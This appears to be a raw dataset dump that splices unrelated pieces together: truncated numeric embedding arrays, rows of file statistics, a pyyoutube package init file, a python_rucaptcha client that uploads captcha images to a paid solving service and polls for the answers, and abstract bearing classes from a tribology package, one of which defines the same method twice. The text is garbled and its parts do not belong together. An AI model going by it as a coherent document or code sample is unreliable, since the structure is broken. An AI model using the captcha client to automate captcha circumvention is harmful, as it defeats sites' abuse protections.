0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0942, 0.02061, 0.0455, -0.01306, 0.01949, -0.01707, -0.01433, 0.02496, 0.0756, -0.004276, 0.00566, 0.0244, 0.005894, -0.00709, -0.1595, -0.00864, 0.02342, 0.0008054, -0.00628, -0.005737, 0.004642, 0.03033, 0.02771, 0.02023, 0.0328, 0.010414, 0.00965, -0.01253, 0.03796, 0.012825, -0.000776, 0.001997, 0.021, 0.01688, 0.02611, 0.01041, -0.01108, 0.010925, 0.007633, -0.003376, 0.02899, 0.00667, 0.01015, 0.03099, -0.01627, 0.0611, 0.01558, 0.03503, 0.04803, 0.0433], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.009834, 0.01839, 0.04886, -0.02513, -0.003483, -0.014145, 0.01135, 0.007214, 0.01855, 0.02634, 0.0324, -0.013695, 0.0338, 0.01982, 0.0166, 0.02132, 0.0293, -0.011086, -0.02547, 0.002277, 0.02394, 0.014824, 0.03012, 0.0175, -0.00288, -0.00401, -0.02869, -0.02325, -0.003735, 0.02802, 0.03378, 0.004795, 0.0282, 0.02325, 0.02936, -0.000864, -0.02907, -0.00758, 0.02469, 0.02925, -0.001065, -0.02135, 0.01368, 0.004406, -0.003145, 0.0548, 0.001895, 0.03394, 0.0464, 0.04593], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0003898, 0.0171, 0.03952, -0.01245, 0.0288, -0.0247, -0.01525, 0.02783, 0.02039, 0.01458, 0.03784, 0.01672, -0.01336, 0.007645, -0.00281, -0.0008245, 0.02202, 0.03656, 0.013596, -0.01276, -0.002771, 0.02348, -0.02379, 0.03403, 0.00738, -0.004013, -0.003126, -0.00997, 0.003012, -0.005707, 0.03632, 0.0004587, 0.01979, 0.01646, 0.01587, 0.04184, -0.003036, 0.001489, 0.02422, -0.00901, 0.001361, 0.01372, 0.03403, 0.027, -0.03467, 0.03488, 0.01619, 0.03296, 0.04294, 0.04636], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -8.994e-05, 0.02197, 0.04672, 0.001197, -0.01602, -0.00402, -0.01828, 0.0078, 0.00407, 0.03833, 0.006664, 0.007362, 0.0337, 0.01912, -0.002636, 0.02448, -0.003706, -0.02486, 0.03278, 0.02357, 0.06113, 0.02034, 0.04242, 0.00818, 0.02634, -0.02672, 0.0209, 0.004925, 0.000363, -0.01549, 0.0275, 0.02939, 0.005413, 0.004063, 0.02324, -0.004074, -0.04987, 0.003078, 0.03128, 0.02652, 0.001796, -0.00929, 0.03284, 0.01808, 0.004498, 0.03065, 0.01044, 0.01078, 0.01485, 0.0548], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0004005, 0.02881, 0.0363, -0.00558, 0.04065, -0.01888, -0.02313, 0.04697, 0.01162, 3.04e-06, 0.02931, 0.000405, -0.03284, 0.007187, -0.000963, -0.02512, 0.013115, 0.05493, -0.03214, -0.0208, -0.01178, 0.0193, -0.03583, 0.03247, 0.00796, 0.001229, 0.015144, -0.01863, 0.004055, -0.01413, 0.0347, -0.01322, 0.0112, 0.0089, 0.01962, 0.0607, 0.01271, 0.002796, 0.02635, 0.005753, 0.001512, 0.01591, 0.0243, 0.05075, -0.04315, 0.02783, 0.01291, 0.01898, 0.03442, 0.04388]]
[-0.0208682, -0.019635, 0.0180678, -0.0176498, 0.0182239, -0.02087, -0.01964, 0.01807, -0.01765, 0.01822]
| 17,509.590909 | 74,424 | 0.555192 | 104,243 | 385,211 | 2.05161 | 0.183024 | 0.476439 | 0.707574 | 0.934005 | 0.241721 | 0.241422 | 0.241422 | 0.241422 | 0.241422 | 0.241422 | 0 | 0.641921 | 0.135295 | 385,211 | 21 | 74,425 | 18,343.380952 | 0.000138 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
79f28f752576f87441a4320d8952fb38979504de | 132 | py | Python | pyyoutube/__init__.py | JoshPaulie/python-youtube | d47da87d03636e4e7166045b4ad9d6426ba43a14 | [
"MIT"
] | 156 | 2019-09-01T13:57:49.000Z | 2022-03-31T13:51:21.000Z | pyyoutube/__init__.py | JoshPaulie/python-youtube | d47da87d03636e4e7166045b4ad9d6426ba43a14 | [
"MIT"
] | 88 | 2019-10-20T16:08:50.000Z | 2022-02-08T10:50:54.000Z | pyyoutube/__init__.py | JoshPaulie/python-youtube | d47da87d03636e4e7166045b4ad9d6426ba43a14 | [
"MIT"
] | 33 | 2019-10-15T17:46:38.000Z | 2022-01-30T04:50:49.000Z | from .api import Api # noqa
from .error import * # noqa
from .models import * # noqa
from .utils.constants import TOPICS # noqa
| 26.4 | 43 | 0.704545 | 19 | 132 | 4.894737 | 0.473684 | 0.258065 | 0.301075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212121 | 132 | 4 | 44 | 33 | 0.894231 | 0.143939 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
036879877fbc183896702bbae644621fe91ed72e | 23,169 | py | Python | python_rucaptcha/ImageCaptcha.py | MasterScott/python-rucaptcha | 187e06511384dbbd52d16d68056c7b7b0c5ab5a3 | [
"MIT"
] | 70 | 2017-08-04T14:20:19.000Z | 2022-02-26T21:13:09.000Z | python_rucaptcha/ImageCaptcha.py | MasterScott/python-rucaptcha | 187e06511384dbbd52d16d68056c7b7b0c5ab5a3 | [
"MIT"
] | 56 | 2017-08-05T22:51:01.000Z | 2022-03-25T10:47:57.000Z | python_rucaptcha/ImageCaptcha.py | MasterScott/python-rucaptcha | 187e06511384dbbd52d16d68056c7b7b0c5ab5a3 | [
"MIT"
] | 28 | 2017-08-08T11:21:12.000Z | 2022-03-27T12:39:19.000Z | import os
import time
import uuid
import base64
import shutil
import asyncio
import aiohttp
import requests
from requests.adapters import HTTPAdapter
from python_rucaptcha.config import app_key
from python_rucaptcha.decorators import api_key_check, service_check
from python_rucaptcha.result_handler import get_sync_result, get_async_result
class ImageCaptcha:
"""
Данный метод подходит как для загрузки и решения обычной капчи
так и для большой капчи.
Требуется передать API ключ сайта, ссылку на изображение и,по желанию, время ожидания решения капчи
Подробней информацию смотрите в методе 'captcha_handler'
"""
def __init__(
self,
rucaptcha_key: str,
sleep_time: int = 5,
save_format: str = "temp",
service_type: str = "2captcha",
img_clearing: bool = True,
img_path: str = "PythonRuCaptchaImages",
**kwargs,
):
"""
Инициализация нужных переменных, создание папки для изображений и кэша
После завершения работы - удалются временные фалйы и папки
:param rucaptcha_key: АПИ ключ капчи из кабинета пользователя
:param sleep_time: Вермя ожидания решения капчи
:param save_format: Формат в котором будет сохраняться изображение, либо как временный фпйл - 'temp',
либо как обычное изображение в папку созданную библиотекой - 'const'.
:param service_type: URL с которым будет работать программа, возможен вариант "2captcha"(стандартный)
и "rucaptcha"
:param img_path: Папка для сохранения изображений капчи;
:param img_clearing: True - удалять файл после решения, False - не удалять файл после решения;
:param kwargs: Служит для передачи необязательных параметров в пайлоад для запроса к RuCaptcha
Подробней с примерами можно ознакомиться в 'CaptchaTester/image_captcha_example.py'
"""
# время ожидания решения капчи
self.sleep_time = sleep_time
# тип URL на с которым будет работать библиотека
self.service_type = service_type
# проверяем переданный параметр способа сохранения капчи
if save_format in ["const", "temp"]:
self.save_format = save_format
# если файл сохраняется в папку, берём параметр названия папки и очистк/не очистки папки от капч
if self.save_format == "const":
# очищаем папку после решения капчи - True, сохраняем все файлы - False
self.img_clearing = img_clearing
# название папки для сохранения файлов капчи
self.img_path = img_path
# создаём папку для сохранения капч
os.makedirs(self.img_path, exist_ok=True)
else:
raise ValueError(
"\nПередан неверный формат сохранения файла изображения. "
f"\n\tВозможные варинты: `temp` и `const`. Вы передали - `{save_format}`"
"\nWrong `save_format` parameter. Valid params: `const` or `temp`."
f"\n\tYour param - `{save_format}`"
)
# пайлоад POST запроса на отправку капчи на сервер
self.post_payload = {
"key": rucaptcha_key,
"method": "base64",
"json": 1,
"soft_id": app_key,
}
# Если переданы ещё параметры - вносим их в post_payload
if kwargs:
for key in kwargs:
self.post_payload.update({key: kwargs[key]})
# пайлоад GET запроса на получение результата решения капчи
self.get_payload = {"key": rucaptcha_key, "action": "get", "json": 1}
# создаём сессию
self.session = requests.Session()
# выставляем кол-во попыток подключения к серверу при ошибке
self.session.mount("http://", HTTPAdapter(max_retries=5))
self.session.mount("https://", HTTPAdapter(max_retries=5))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type:
return False
return True
def __image_temp_saver(self, content: bytes):
"""
Метод сохраняет файл изображения как временный и отправляет его сразу на сервер для расшифровки.
:return: Возвращает ID капчи из сервиса
"""
captcha_id = None
try:
# Отправляем на рукапча изображение капчи и другие парметры,
# в результате получаем JSON ответ с номером решаемой капчи и получая ответ - извлекаем номер
self.post_payload.update({"body": base64.b64encode(content).decode("utf-8")})
captcha_id = self.session.post(self.url_request, data=self.post_payload).json()
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
def __image_const_saver(self, content: bytes):
"""
Метод создаёт папку и сохраняет в неё изображение, затем передаёт его на расшифровку и удалет файл.
:param content: Файл для сохранения;
:return: Возвращает ID капчи из сервиса
"""
captcha_id = None
try:
# уникальное имя изображения
image_name = uuid.uuid4()
# сохраняем в папку изображение
with open(os.path.join(self.img_path, f"im-{image_name}.png"), "wb") as out_image:
out_image.write(content)
with open(os.path.join(self.img_path, f"im-{image_name}.png"), "rb") as captcha_image:
# Отправляем на рукапча изображение капчи и другие парметры,
# в результате получаем JSON ответ с номером решаемой капчи и получая ответ - извлекаем номер
self.post_payload.update(
{"body": base64.b64encode(captcha_image.read()).decode("utf-8")}
)
captcha_id = self.session.post(self.url_request, data=self.post_payload).json()
except (IOError, FileNotFoundError) as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
def __local_image_captcha(self, content: str, content_type: str = "file"):
"""
Метод получает в качестве параметра ссылку на локальный файл(или файл в кодировке base64),
считывает изображение и отправляет его на РуКапчу для проверки и получения её ID
:param content: Ссылка на локальный файл
:param content_type: Тип передаваемого файла, Может быть `file`(если передан локальный адрес) или
`base64`(если передано изображение в кодировке base64)
:return: ID капчи в сервисе
"""
captcha_id = None
try:
# пробуем открыть файл, закодировать в base64, затем вносим закодированный файл в post_payload для отправки
# на рукапчу для решения
if content_type == "file":
with open(content, "rb") as captcha_image:
self.post_payload.update(
{"body": base64.b64encode(captcha_image.read()).decode("utf-8")}
)
# вносим закодированный файл в post_payload для отправки на рукапчу для решения
elif content_type == "base64":
self.post_payload.update({"body": content})
else:
raise ValueError(
f"Передан неверный тип контента! Допустимые: `file` и `base64`. "
f"Вы передали: `{content_type}`"
)
# Отправляем на рукапча изображение капчи и другие парметры,
# в результате получаем JSON ответ с номером решаемой капчи и получая ответ - извлекаем номер
captcha_id = self.session.post(self.url_request, data=self.post_payload).json()
except (IOError, FileNotFoundError) as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
@api_key_check
@service_check
def captcha_handler(
self,
captcha_link: str = None,
captcha_file: str = None,
captcha_base64: str = None,
**kwargs,
):
"""
Метод получает от вас ссылку на изображение, отправляет изображение на сервер
RuCaptcha, дожидается решения капчи и вовзращает вам результат
:param captcha_link: Ссылка на изображение
:param captcha_file: Адрес(локальный) по которому находится изображение
для отправки на расшифровку
:param captcha_base64: Изображение переданное в кодировке base64
:param kwargs: Параметры для библиотеки `requests`
:return: Ответ на капчу в виде JSON строки с полями:
captchaSolve - решение капчи,
taskId - находится Id задачи на решение капчи,
error - False - если всё хорошо, True - если есть ошибка,
errorBody - название ошибки
"""
# result, url_request, url_response -
# задаются в декораторе `service_check`, после проверки переданного названия
# если передана локальная ссылка на файл
if captcha_file:
captcha_id = self.__local_image_captcha(captcha_file)
# если передан файл в кодировке base64
elif captcha_base64:
captcha_id = self.__local_image_captcha(captcha_base64, content_type="base64")
# если передан URL
elif captcha_link:
try:
content = self.session.get(url=captcha_link, **kwargs).content
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
return self.result
# согласно значения переданного параметра выбираем функцию для сохранения изображения
if self.save_format == "const":
captcha_id = self.__image_const_saver(content)
elif self.save_format == "temp":
captcha_id = self.__image_temp_saver(content)
else:
# если не передан ни один из параметров
self.result.update(
{"error": True, "errorBody": "You did not send any file local link or URL."}
)
return self.result
# проверяем наличие ошибок при скачивании/передаче файла на сервер
if self.result["error"]:
return self.result
# если вернулся ответ с ошибкой то записываем её и возвращаем результат
elif captcha_id["status"] == 0:
self.result.update({"error": True, "errorBody": captcha_id["request"]})
return self.result
# иначе берём ключ отправленной на решение капчи и ждём решения
else:
captcha_id = captcha_id["request"]
# вписываем в taskId ключ отправленной на решение капчи
self.result.update({"taskId": captcha_id})
# обновляем пайлоад, вносим в него ключ отправленной на решение капчи
self.get_payload.update({"id": captcha_id})
# если передан параметр `pingback` - не ждём решения капчи а возвращаем незаполненный ответ
if self.post_payload.get("pingback"):
return self.get_payload
else:
# Ожидаем решения капчи
time.sleep(self.sleep_time)
return get_sync_result(
get_payload=self.get_payload,
sleep_time=self.sleep_time,
url_response=self.url_response,
result=self.result,
)
def __del__(self):
if self.save_format == "const":
if self.img_clearing:
shutil.rmtree(self.img_path)
class aioImageCaptcha:
"""
Данный асинхронный метод подходит как для загрузки и решения обычной капчи
так и для большой капчи.
Требуется передать API ключ сайта, ссылку на изображение и,по желанию, время ожидания решения капчи
Подробней информацию смотрите в методе 'captcha_handler'
"""
def __init__(
self,
rucaptcha_key: str,
sleep_time: int = 5,
save_format: str = "temp",
service_type: str = "2captcha",
img_clearing: bool = True,
img_path: str = "PythonRuCaptchaImages",
**kwargs,
):
"""
Инициализация нужных переменных, создание папки для изображений и кэша
После завершения работы - удалются временные фалйы и папки
:param rucaptcha_key: АПИ ключ капчи из кабинета пользователя
:param sleep_time: Вермя ожидания решения капчи
:param save_format: Формат в котором будет сохраняться изображение,
либо как временный фпйл - 'temp',
либо как обычное изображение в папку созданную библиотекой - 'const'.
:param service_type: URL с которым будет работать программа,
возможен вариант "2captcha"(стандартный) и "rucaptcha"
:param img_path: Папка для сохранения изображений капчи;
:param img_clearing: True - удалять файл после решения,
False - не удалять файл после решения;
:param kwargs: Служит для передачи необязательных параметров
в пайлоад для запроса к RuCaptcha
Подробней с примерами можно ознакомиться в 'CaptchaTester/image_captcha_example.py'
"""
# время ожидания решения капчи
self.sleep_time = sleep_time
# тип URL на с которым будет работать библиотека
self.service_type = service_type
# проверяем переданный параметр способа сохранения капчи
if save_format in ["const", "temp"]:
self.save_format = save_format
# если файл сохраняется в папку
if self.save_format == "const":
# очищаем папку после решения капчи - True,
# сохраняем все файлы - False
self.img_clearing = img_clearing
# название папки для сохранения файлов капчи
self.img_path = img_path
# создаём папку для сохранения капч
os.makedirs(self.img_path, exist_ok=True)
else:
raise ValueError(
"\nПередан неверный формат сохранения файла изображения. "
f"\n\tВозможные варинты: `temp` и `const`. Вы передали - `{save_format}`"
"\nWrong `save_format` parameter. Valid params: `const` or `temp`."
f"\n\tYour param - `{save_format}`"
)
# пайлоад POST запроса на отправку капчи на сервер
self.post_payload = {
"key": rucaptcha_key,
"method": "base64",
"json": 1,
"soft_id": app_key,
}
# Если переданы ещё параметры - вносим их в post_payload
if kwargs:
for key in kwargs:
self.post_payload.update({key: kwargs[key]})
# пайлоад GET запроса на получение результата решения капчи
self.get_payload = {"key": rucaptcha_key, "action": "get", "json": 1}
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type:
return False
return True
async def __image_temp_saver(self, content: bytes):
"""
Метод отправляет капчу сразу на сервер для расшифровки.
:return: Возвращает ID капчи из сервиса
"""
captcha_id = None
try:
self.post_payload.update({"body": base64.b64encode(content).decode("utf-8")})
async with aiohttp.ClientSession() as session:
async with session.post(self.url_request, data=self.post_payload) as resp:
captcha_id = await resp.json()
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
async def __image_const_saver(self, content: bytes):
"""
Метод создаёт папку и сохраняет в неё изображение
:return: Возвращает ID капчи из сервиса
"""
captcha_id = None
try:
# уникальное имя изображения
image_name = uuid.uuid4()
with open(os.path.join(self.img_path, f"im-{image_name}.png"), "wb") as out_image:
out_image.write(content)
with open(os.path.join(self.img_path, f"im-{image_name}.png"), "rb") as captcha_image:
# Отправляем на рукапча изображение капчи и другие парметры
self.post_payload.update(
{"body": base64.b64encode(captcha_image.read()).decode("utf-8")}
)
async with aiohttp.ClientSession() as session:
async with session.post(self.url_request, data=self.post_payload) as resp:
captcha_id = await resp.json()
except (IOError, FileNotFoundError) as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
async def __local_image_captcha(self, content: str, content_type: str = "file"):
"""
Метод получает в качестве параметра ссылку на локальный файл
(или файл в кодировке base64)
для проверки и получения её ID
:param content: Ссылка на локальный файл
:param content_type: Тип передаваемого файла,
может быть `file`(если передан локальный адрес) или
`base64`(если передано изображение в кодировке base64)
:return: ID капчи в сервисе
"""
captcha_id = None
try:
if content_type == "file":
with open(content, "rb") as captcha_image:
# Отправляем на рукапча изображение капчи и другие парметры
self.post_payload.update(
{"body": base64.b64encode(captcha_image.read()).decode("utf-8")}
)
elif content_type == "base64":
self.post_payload.update({"body": content})
else:
raise ValueError(
f"Передан неверный тип контента! Допустимые: `file` и `base64`. "
f"Вы передали: `{content_type}`"
)
async with aiohttp.ClientSession() as session:
async with session.post(self.url_request, data=self.post_payload) as resp:
captcha_id = await resp.json()
except (IOError, FileNotFoundError) as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
@api_key_check
@service_check
async def captcha_handler(
self,
captcha_link: str = None,
captcha_file: str = None,
captcha_base64: str = None,
proxy: str = None,
):
"""
Метод получает от вас капчу и отправляет изображение на сервер
RuCaptcha, дожидается решения капчи и вовзращает вам результат
:param captcha_link: Ссылка на изображение
:param captcha_file: Адрес(локальный) по которому находится изображение
для отправки на расшифровку
:param captcha_base64: Изображение переданное в кодировке base64
:param proxy: Прокси для aiohttp модуля
:return: Ответ на капчу в виде JSON строки с полями:
captchaSolve - решение капчи,
taskId - находится Id задачи на решение капчи,
error - False - если всё хорошо, True - если есть ошибка,
errorBody - название ошибки
"""
# result, url_request, url_response -
# задаются в декораторе `service_check`, после проверки
# если передана локальная ссылка на файл - работаем с ним
if captcha_file:
captcha_id = await self.__local_image_captcha(captcha_file)
# если передан файл в кодировке base64
elif captcha_base64:
captcha_id = await self.__local_image_captcha(captcha_base64, content_type="base64")
elif captcha_link:
try:
async with aiohttp.ClientSession() as session:
async with session.get(url=captcha_link, proxy=proxy) as resp:
content = await resp.content.read()
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
return self.result
# согласно значения переданного параметра обрабатываем файл
if self.save_format == "const":
captcha_id = await self.__image_const_saver(content)
elif self.save_format == "temp":
captcha_id = await self.__image_temp_saver(content)
else:
self.result.update(
{"error": True, "errorBody": "You did not send any file local link or URL."}
)
return self.result
# проверяем наличие ошибок при скачивании/передаче файла на сервер
if self.result["error"]:
return self.result
# если вернулся ответ с ошибкой то записываем её и возвращаем результат
elif captcha_id["status"] == 0:
self.result.update({"error": True, "errorBody": captcha_id["request"]})
return self.result
# иначе берём ключ отправленной на решение капчи и ждём решения
else:
captcha_id = captcha_id["request"]
# вписываем в taskId ключ отправленной на решение капчи
self.result.update({"taskId": captcha_id})
# обновляем пайлоад, вносим в него ключ капчи
self.get_payload.update({"id": captcha_id})
# если передан параметр `pingback` - возвращаем незаполненный ответ
if self.post_payload.get("pingback"):
return self.get_payload
else:
# Ожидаем решения капчи
await asyncio.sleep(self.sleep_time)
return await get_async_result(
get_payload=self.get_payload,
sleep_time=self.sleep_time,
url_response=self.url_response,
result=self.result,
)
def __del__(self):
if self.save_format == "const":
if self.img_clearing:
shutil.rmtree(self.img_path)
| 42.202186 | 119 | 0.601062 | 2,591 | 23,169 | 5.238132 | 0.147819 | 0.025199 | 0.022104 | 0.024757 | 0.908709 | 0.897804 | 0.887121 | 0.882037 | 0.875037 | 0.863543 | 0 | 0.00723 | 0.319479 | 23,169 | 548 | 120 | 42.279197 | 0.853555 | 0.305797 | 0 | 0.819672 | 0 | 0 | 0.107462 | 0.002999 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039344 | false | 0 | 0.039344 | 0.006557 | 0.163934 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cef3b29f61b7d37f44c3f9a47e324f8ac0958e15 | 6,350 | py | Python | tribology/p3can/BluPrintRollBear.py | moritzploss/tribology | 09bf75d670fb3d86575ca4bdced00d5dce2d4af7 | [
"MIT"
] | 11 | 2017-11-23T12:55:05.000Z | 2022-02-06T23:04:39.000Z | tribology/p3can/BluPrintRollBear.py | moritzploss/tribology | 09bf75d670fb3d86575ca4bdced00d5dce2d4af7 | [
"MIT"
] | 5 | 2021-03-18T20:59:50.000Z | 2022-03-11T23:29:22.000Z | tribology/p3can/BluPrintRollBear.py | moritzploss/tribology | 09bf75d670fb3d86575ca4bdced00d5dce2d4af7 | [
"MIT"
] | 4 | 2019-06-15T04:23:25.000Z | 2022-02-06T23:04:22.000Z | from abc import ABCMeta, abstractmethod
from BluPrintTriboSys import TriboSys
class RollBear(TriboSys):
# TODO: add class attribute describtion
"""
Attributes:
wheels: An integer representing the number of wheels the vehicle has.
"""
__metaclass__ = ABCMeta
def __init__(self, name, number_rollers, roller, inner_ring, outer_ring,
global_force, init_force):
super().__init__(name, global_force, init_force)
self.roller = roller
self.ring1 = inner_ring
self.ring2 = outer_ring
self.num_rollers = number_rollers
self.rot_vel1 = 0
self.rot_vel2 = 0
self.mean_diam = None
self.eff_rot_vel = None
self.eff_omega = None
self.eff_omega_cage = None
self.footpr_vel = None
self.actual_raceway_vel_roller = None
@abstractmethod
def calc_load_distribution(self, ui=None, res_dir=None):
"""Calculate the load distribution within the tribosystem"""
pass
@abstractmethod
def calc_contact_pressure(self, ui=None, res_dir=None):
"""Calculate the contact pressure for each contact in the tribosystem"""
pass
@abstractmethod
def calc_kinematics(self, rot_velocity, rot_velocity2, ui=None,
res_dir=None):
"""Calculate the kinematics of the tribosystem"""
pass
@abstractmethod
def calc_pv(self, ui=None, res_dir=None):
""""Calculate the product of the local maximum pressure and the
relative velocity between ring and roller"""
pass
@abstractmethod
def calc_e_akin(self, ui=None, res_dir=None):
""""Calculate the kinetic friction energy accumulation"""
pass
@abstractmethod
def plot_it(self, ui=None, res_dir=None):
"""Plot relevant calculation results"""
pass
@abstractmethod
def generate_latex_output(self, calc_spec_tex_file_handle, simulation,
ui=None, res_dir=None):
pass
@abstractmethod
def generate_latex_figures(self, ui=None, res_dir=None):
pass
class AxialRollBear(RollBear):
"""Global bearing data"""
def __init__(self, name, number_rollers, roller, shaft_ring, housing_ring,
global_force, mean_diameter):
super().__init__(name, number_rollers, roller, shaft_ring, housing_ring,
global_force,
global_force / number_rollers)
self.mean_diameter = mean_diameter
self.pv = None
@abstractmethod
def calc_load_distribution(self, ui=None, res_dir=None):
"""Calculate the load distribution within the tribosystem"""
pass
@abstractmethod
def calc_contact_pressure(self, ui=None, res_dir=None):
"""Calculate the contact pressure for each contact in the tribosystem"""
pass
@abstractmethod
def calc_kinematics(self, rot_velocity, rot_velocity2, ui=None,
res_dir=None):
"""Calculate the kinematics of the tribosystem"""
pass
@abstractmethod
def calc_pv(self, ui=None, res_dir=None):
""""Calculate the product of the local maximum pressure and the relative
velocity between ring and roller"""
pass
@abstractmethod
def calc_e_akin(self, ui=None, res_dir=None):
""""Calculate the kinetic friction energy accumulation"""
pass
@abstractmethod
def plot_it(self, ui=None, res_dir=None):
"""Plot relevant calculation results"""
pass
@abstractmethod
def generate_latex_output(self, calc_spec_tex_file_handle, simulation,
ui=None, res_dir=None):
pass
@abstractmethod
def generate_latex_figures(self, ui=None, res_dir=None):
pass
class RadialRollBear(RollBear):
"""Global bearing data"""
def __init__(self, name, number_rollers, roller, inner_ring, outer_ring,
global_force, radial_clearance, res_pol,
path_roller_slip):
super().__init__(name, number_rollers, roller, inner_ring, outer_ring,
global_force, global_force)
self.mean_diameter = (self.ring1.diameter - self.ring2.diameter) / 2
self.rad_clear = radial_clearance
self.pv_ring1 = None
self.pv_ring2 = None
self.path_roller_slip = path_roller_slip
self.res_pol = res_pol
self.pol_ax = None
self.dd_phi = None
self.d_phi = None
self.num_roller_pos = None
self.phi_mat = None
self.phi = None
@abstractmethod
def calc_load_distribution(self, ui=None, res_dir=None):
"""Calculate the load distribution within the tribosystem"""
pass
@abstractmethod
def calc_contact_pressure(self, ui=None, res_dir=None):
"""Calculate the contact pressure for each contact in the tribosystem"""
pass
@abstractmethod
def calc_kinematics(self, rot_velocity, rot_velocity2, ui=None,
res_dir=None):
"""Calculate the kinematics of the tribosystem"""
pass
@abstractmethod
def calc_pv(self, ui=None, res_dir=None):
""""Calculate the product of the local maximum pressure and the relative
velocity between ring and roller"""
pass
@abstractmethod
def calc_e_akin(self, ui=None, res_dir=None):
""""Calculate the kinetic friction energy accumulation"""
pass
@abstractmethod
def calc_e_akin(self, ui=None, res_dir=None):
""""Calculate the kinetic friction energy accumulation"""
pass
@abstractmethod
def plot_it(self, ui=None, res_dir=None):
"""Plot relevant calculation results"""
pass
@abstractmethod
def generate_latex_output(self, calc_spec_tex_file_handle, simulation,
ui=None, res_dir=None):
"""Generate LaTeX output"""
pass
@abstractmethod
def generate_latex_figures(self, ui=None, res_dir=None):
"""Generate LaTeX figures"""
pass
